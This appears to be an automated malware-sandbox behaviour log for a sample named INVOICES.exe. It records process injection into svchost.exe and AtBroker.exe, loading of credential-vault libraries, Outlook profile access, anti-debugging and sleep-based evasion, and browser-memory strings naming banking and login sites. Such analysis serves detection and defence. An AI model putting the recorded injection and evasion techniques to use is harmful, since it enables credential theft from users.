                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XORjEgwNIUb.exe, 00000004.00000002.3876547511.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3876353639.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0085CA00 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0085CA00
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073C590 push eax; retn 0073h0_2_0073C599
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00758AC5 push ecx; ret 0_2_00758AD8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00745524 push dword ptr [edi+00h]; retf 0_2_0074552C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BF808 push ds; ret 0_2_007BF80A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417866 push FFFFFFD4h; iretd 2_2_00417880
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D152 push edi; iretd 2_2_0040D1EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403100 push eax; ret 2_2_00403102
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D1DE push edi; iretd 2_2_0040D1EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405A8E push ds; ret 2_2_00405A91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408338 push ebx; retf 2_2_0040833E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411BF6 push B5504480h; ret 2_2_00411C05
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C7F pushad ; iretd 2_2_00418C8A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414C1D pushad ; ret 2_2_00414C1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BC36 push edi; ret 2_2_0040BC3B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041848E push eax; iretd 2_2_004184AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004156C1 push FFFFFFE6h; ret 2_2_00415703
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418EB6 push edi; ret 2_2_00418EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A7AE push cs; retf 2_2_0041A7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047209AD push ecx; mov dword ptr [esp], ecx5_2_047209B6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003525BE push FFFFFFE6h; ret 5_2_00352600
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00354763 push FFFFFFD4h; iretd 5_2_0035477D
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034298B push ds; ret 5_2_0034298E
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034EAF3 push B5504480h; ret 5_2_0034EB02
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00348B33 push edi; ret 5_2_00348B38
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00345235 push ebx; retf 5_2_0034523B
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0035538B push eax; iretd 5_2_003553A9
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00734A35
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007B53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007B53DF
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00753307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00753307
                Source: C:\Users\user\Desktop\INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\INVOICES.exeAPI/Special instruction interceptor: Address: 943214
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\AtBroker.exeWindow / User API: threadDelayed 9841Jump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99105
                Source: C:\Users\user\Desktop\INVOICES.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\AtBroker.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164Thread sleep count: 9841 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164Thread sleep time: -19682000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180Thread sleep time: -41000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0079449B
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079C75D FindFirstFileW,FindClose,0_2_0079C75D
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0079C7E8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F021
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F17E
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079F47F
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00793833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793833
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00793B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793B56
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079BD48
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0035C720 FindFirstFileW,FindNextFileW,FindClose,5_2_0035C720
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00734AFE
                Source: 27-180b5.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 27-180b5.5.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696494690n
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: XORjEgwNIUb.exe, 00000006.00000002.3876977168.0000000001269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: 27-180b5.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 27-180b5.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 27-180b5.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,1169
                Source: 27-180b5.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers.comVMware20,11696494690}
                Source: 27-180b5.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 27-180b5.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696494690d
                Source: 27-180b5.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 0000000A.00000002.1990649752.00000244268BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                Source: 27-180b5.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 27-180b5.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696494690s
                Source: 27-180b5.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 27-180b5.5.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 27-180b5.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 27-180b5.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 27-180b5.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,1169649
                Source: 27-180b5.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696494690}
                Source: 27-180b5.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 27-180b5.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177D3 LdrLoadDll,2_2_004177D3
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A401F BlockInput,0_2_007A401F
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00733B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733B4C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00765BFC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00765BFC
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0085CA00 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0085CA00
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00943480 mov eax, dword ptr fs:[00000030h]0_2_00943480
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_009434E0 mov eax, dword ptr fs:[00000030h]0_2_009434E0
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00941E70 mov eax, dword ptr fs:[00000030h]0_2_00941E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
